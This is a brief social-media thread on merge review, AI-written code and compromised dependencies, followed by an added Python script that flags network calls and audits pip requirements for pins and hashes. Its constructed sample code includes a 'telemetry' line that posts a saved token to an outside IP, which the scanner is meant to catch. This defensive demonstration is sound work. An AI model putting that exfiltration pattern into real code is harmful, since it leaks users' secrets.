If you’re reviewing the code you’re merging, it’s quite simple to see where the security flaws are. Mostly, fine-combing all network calls will cover your buns. There are additional nuances to look out for, but it’s not as worrisome as you might think with the proper due diligence. I’m sure nostr:nprofile1qqs9pk20ctv9srrg9vr354p03v0rrgsqkpggh2u45va77zz4mu5p6ccprpmhxue69uhhyetvv9ujuumfv9khxarj9e3k7mf0qythwumn8ghj7un9d3shjt3s0p3ksct59e3k7mf0rmlce2 has that under control!
Discussion
Exactly. I'm worried about a lack of due diligence.
Makes sense, nostr:nprofile1qqs24wf73cl6d2yhfcwp7vveuheantah42nshq3kaya9kta0at7t6wspzfmhxue69uhhqatjwpkx2urpvuhx2ucpzamhxue69uhkxun9v968ytnwdaehgu3wwa5kuegxhdzxr. That is an existing problem, however: lack of dev due diligence. AI simply exacerbates it. I’m quite concerned about hacked open-source libraries and the propagation of malicious code through unattended external dependencies. Definitely a big security hole when mismanaged, and it’s incredibly easy to mismanage. Less concerned today about LLMs directly including malicious snippets, but… ya never know! Practice vigilance today, feel the joy tomorrow!
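The two checks the thread keeps coming back to, fine-combing network calls in code you are about to merge and not leaving external dependencies unattended, can both be turned into something a reviewer actually runs. The script below is an added example written for this page, not code posted by either participant. It assumes a Python code base with a pip requirements file; the call-site patterns, the sample source (which contains a constructed "telemetry" exfil line) and the requirements text are all constructed for the demo, and the sha256 digest is a placeholder, not a real hash.

```python
import re
from typing import Dict, List, Tuple

# Call sites that can move data off the machine. Hypothetical starter list for a
# Python code base; extend it for whatever HTTP/socket/process libraries you use.
NETWORK_CALL_RE = re.compile(
    r"\b(requests\.(?:get|post|put|patch|delete|request)"
    r"|urllib\.request\.urlopen"
    r"|socket\.(?:socket|create_connection)"
    r"|httpx\.(?:get|post|Client)"
    r"|subprocess\.(?:run|Popen|call|check_output))\s*\("
)
# Hard-coded URLs or IP literals in source are worth a second look on their own.
URL_RE = re.compile(r"https?://[^\s'\"]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")


def find_network_calls(source: str) -> List[Tuple[int, str]]:
    """Return (line number, line) for every line that reaches the network.

    Comment-only lines are skipped so a reviewer's note about a call is not
    reported as a call.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        if NETWORK_CALL_RE.search(line) or URL_RE.search(line):
            findings.append((lineno, stripped))
    return findings


# A requirement counts as pinned only with an exact "==" version, and as
# verified only when pip's --hash option is present for it.
PIN_RE = re.compile(r"^([A-Za-z0-9_.\-\[\]]+)==([^\s\\;]+)")
HASH_RE = re.compile(r"--hash=sha256:[0-9a-f]{64}")


def audit_requirements(text: str) -> Dict[str, List[str]]:
    """Classify each requirement as 'unpinned', 'unhashed' or 'ok'."""
    joined = text.replace("\\\n", " ")  # pip allows backslash continuations
    report: Dict[str, List[str]] = {"unpinned": [], "unhashed": [], "ok": []}
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # options such as -r / --index-url
            continue
        m = PIN_RE.match(line)
        if not m:
            name = re.split(r"[<>=!~;\s\[]", line, maxsplit=1)[0]
            report["unpinned"].append(name)
        elif not HASH_RE.search(line):
            report["unhashed"].append(m.group(1))
        else:
            report["ok"].append(m.group(1))
    return report


# Constructed sample source: a helper that quietly ships a secret off-box.
SAMPLE_DIFF_SOURCE = """\
import os
import requests  # constructed sample
def save_token(token):
    with open(os.path.expanduser("~/.cfg"), "w") as f:
        f.write(token)
    # "telemetry" that quietly ships the token somewhere
    requests.post("http://203.0.113.5/collect", data={"t": token})
def add(a, b):
    return a + b
"""

FAKE_HASH = "a" * 64  # placeholder digest for the demo, not a real sha256
# Constructed sample requirements file mixing pinned, hashed and loose entries.
SAMPLE_REQUIREMENTS = (
    "# constructed sample\n"
    "requests==2.31.0 \\\n"
    "    --hash=sha256:" + FAKE_HASH + "\n"
    "pyyaml>=6.0\n"
    "left-pad-ish==1.0.0\n"
    "-r base.txt\n"
)

if __name__ == "__main__":
    for lineno, line in find_network_calls(SAMPLE_DIFF_SOURCE):
        print(f"network call at line {lineno}: {line}")
    for status, names in audit_requirements(SAMPLE_REQUIREMENTS).items():
        print(f"{status}: {', '.join(names) or '-'}")
```

Run against a real diff, this would flag the `requests.post` line for a human to read, and the requirements audit would send `pyyaml` (floating range) and `left-pad-ish` (pinned but no hash) back for a pin and a `--hash` entry. It is a review aid, not a gate: a determined author can hide a call behind `getattr` or a dynamic import, which is exactly why the thread's point about actually reading the code still stands.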